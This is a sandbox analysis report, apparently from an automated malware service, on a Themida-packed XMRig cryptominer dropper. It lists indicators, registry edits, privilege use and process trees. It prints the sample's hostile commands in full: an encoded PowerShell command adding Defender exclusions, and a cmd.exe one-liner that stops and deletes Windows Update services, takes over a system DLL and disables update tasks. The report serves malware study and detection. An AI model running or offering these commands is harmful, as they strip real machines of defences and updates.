xmrig | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

Analysis

max time kernel
300s
max time network
294s
platform
windows10_x64
resource
win10-20220414-en
resource tags

arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system
submitted
05-08-2022 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Size

7.1MB
MD5

2144e985a1fb8a18636dee1b1fcf096f
SHA1

fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512

48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3112-451-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3112-452-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/3112-454-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3112-456-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3112-469-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3112-470-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

2308 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1644 takeown.exe
4040 icacls.exe
1596 takeown.exe
3188 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2308	updater.exe

pid	process
1644	takeown.exe
4040	icacls.exe
1596	takeown.exe
3188	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

4040 icacls.exe
1596 takeown.exe
3188 icacls.exe
1644 takeown.exe

pid	process
4040	icacls.exe
1596	takeown.exe
3188	icacls.exe
1644	takeown.exe

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/544-118-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/544-119-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/544-121-0x0000000000400000-0x0000000001066000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/2308-261-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/2308-263-0x0000000000400000-0x0000000001066000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exe

pid process

544 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
2308 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2600 set thread context of 3112 2600 conhost.exe explorer.exe

pid	process
544	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
2308	updater.exe

description	pid	process	target process
PID 2600 set thread context of 3112	2600	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4860 sc.exe
2732 sc.exe
4808 sc.exe
3196 sc.exe
3768 sc.exe
5056 sc.exe
1896 sc.exe
2940 sc.exe
4912 sc.exe
3736 sc.exe

pid	process
4860	sc.exe
2732	sc.exe
4808	sc.exe
3196	sc.exe
3768	sc.exe
5056	sc.exe
1896	sc.exe
2940	sc.exe
4912	sc.exe
3736	sc.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.EXEconhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1784	reg.exe
4452	reg.exe
1932	reg.exe
3876	reg.exe
3460	reg.exe
1536	reg.exe
2644	reg.exe
1848	reg.exe
1984	reg.exe
60	reg.exe
4480	reg.exe
4544	reg.exe
4788	reg.exe
2200	reg.exe
4520	reg.exe
4564	reg.exe
4536	reg.exe
1880	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exe

pid	process
1196	powershell.exe
1196	powershell.exe
1196	powershell.exe
680	conhost.exe
3180	powershell.exe
3180	powershell.exe
3180	powershell.exe
1532	powershell.EXE
1532	powershell.EXE
1532	powershell.EXE
5016	powershell.exe
5016	powershell.exe
5016	powershell.exe
2600	conhost.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe
3112	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeIncreaseQuotaPrivilege	1196	powershell.exe
Token: SeSecurityPrivilege	1196	powershell.exe
Token: SeTakeOwnershipPrivilege	1196	powershell.exe
Token: SeLoadDriverPrivilege	1196	powershell.exe
Token: SeSystemProfilePrivilege	1196	powershell.exe
Token: SeSystemtimePrivilege	1196	powershell.exe
Token: SeProfSingleProcessPrivilege	1196	powershell.exe
Token: SeIncBasePriorityPrivilege	1196	powershell.exe
Token: SeCreatePagefilePrivilege	1196	powershell.exe
Token: SeBackupPrivilege	1196	powershell.exe
Token: SeRestorePrivilege	1196	powershell.exe
Token: SeShutdownPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeSystemEnvironmentPrivilege	1196	powershell.exe
Token: SeRemoteShutdownPrivilege	1196	powershell.exe
Token: SeUndockPrivilege	1196	powershell.exe
Token: SeManageVolumePrivilege	1196	powershell.exe
Token: 33	1196	powershell.exe
Token: 34	1196	powershell.exe
Token: 35	1196	powershell.exe
Token: 36	1196	powershell.exe
Token: SeShutdownPrivilege	4832	powercfg.exe
Token: SeCreatePagefilePrivilege	4832	powercfg.exe
Token: SeDebugPrivilege	680	conhost.exe
Token: SeShutdownPrivilege	4256	powercfg.exe
Token: SeCreatePagefilePrivilege	4256	powercfg.exe
Token: SeShutdownPrivilege	4208	powercfg.exe
Token: SeCreatePagefilePrivilege	4208	powercfg.exe
Token: SeShutdownPrivilege	4192	powercfg.exe
Token: SeCreatePagefilePrivilege	4192	powercfg.exe
Token: SeTakeOwnershipPrivilege	1644	takeown.exe
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeIncreaseQuotaPrivilege	3180	powershell.exe
Token: SeSecurityPrivilege	3180	powershell.exe
Token: SeTakeOwnershipPrivilege	3180	powershell.exe
Token: SeLoadDriverPrivilege	3180	powershell.exe
Token: SeSystemProfilePrivilege	3180	powershell.exe
Token: SeSystemtimePrivilege	3180	powershell.exe
Token: SeProfSingleProcessPrivilege	3180	powershell.exe
Token: SeIncBasePriorityPrivilege	3180	powershell.exe
Token: SeCreatePagefilePrivilege	3180	powershell.exe
Token: SeBackupPrivilege	3180	powershell.exe
Token: SeRestorePrivilege	3180	powershell.exe
Token: SeShutdownPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeSystemEnvironmentPrivilege	3180	powershell.exe
Token: SeRemoteShutdownPrivilege	3180	powershell.exe
Token: SeUndockPrivilege	3180	powershell.exe
Token: SeManageVolumePrivilege	3180	powershell.exe
Token: 33	3180	powershell.exe
Token: 34	3180	powershell.exe
Token: 35	3180	powershell.exe
Token: 36	3180	powershell.exe
Token: SeIncreaseQuotaPrivilege	3180	powershell.exe
Token: SeSecurityPrivilege	3180	powershell.exe
Token: SeTakeOwnershipPrivilege	3180	powershell.exe
Token: SeLoadDriverPrivilege	3180	powershell.exe
Token: SeSystemProfilePrivilege	3180	powershell.exe
Token: SeSystemtimePrivilege	3180	powershell.exe
Token: SeProfSingleProcessPrivilege	3180	powershell.exe
Token: SeIncBasePriorityPrivilege	3180	powershell.exe
Token: SeCreatePagefilePrivilege	3180	powershell.exe
Token: SeBackupPrivilege	3180	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 544 wrote to memory of 680	544	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 544 wrote to memory of 680	544	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 544 wrote to memory of 680	544	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 680 wrote to memory of 1196	680	conhost.exe	powershell.exe
PID 680 wrote to memory of 1196	680	conhost.exe	powershell.exe
PID 680 wrote to memory of 4252	680	conhost.exe	cmd.exe
PID 680 wrote to memory of 4252	680	conhost.exe	cmd.exe
PID 680 wrote to memory of 4884	680	conhost.exe	cmd.exe
PID 680 wrote to memory of 4884	680	conhost.exe	cmd.exe
PID 4252 wrote to memory of 3768	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 3768	4252	cmd.exe	sc.exe
PID 4884 wrote to memory of 4832	4884	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 4832	4884	cmd.exe	powercfg.exe
PID 4252 wrote to memory of 4860	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 4860	4252	cmd.exe	sc.exe
PID 4884 wrote to memory of 4256	4884	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 4256	4884	cmd.exe	powercfg.exe
PID 4252 wrote to memory of 5056	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 5056	4252	cmd.exe	sc.exe
PID 4884 wrote to memory of 4208	4884	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 4208	4884	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 4192	4884	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 4192	4884	cmd.exe	powercfg.exe
PID 4252 wrote to memory of 2732	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 2732	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 1896	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 1896	4252	cmd.exe	sc.exe
PID 4252 wrote to memory of 1932	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 1932	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4788	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4788	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 2200	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 2200	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 3876	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 3876	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 60	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 60	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 1644	4252	cmd.exe	takeown.exe
PID 4252 wrote to memory of 1644	4252	cmd.exe	takeown.exe
PID 680 wrote to memory of 3180	680	conhost.exe	powershell.exe
PID 680 wrote to memory of 3180	680	conhost.exe	powershell.exe
PID 4252 wrote to memory of 4040	4252	cmd.exe	icacls.exe
PID 4252 wrote to memory of 4040	4252	cmd.exe	icacls.exe
PID 4252 wrote to memory of 4480	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4480	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4520	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4520	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4544	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 4544	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 1784	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 1784	4252	cmd.exe	reg.exe
PID 4252 wrote to memory of 3188	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 3188	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 2956	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 2956	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 4640	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 4640	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 1576	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 1576	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 1884	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 1884	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 2612	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 2612	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 4664	4252	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
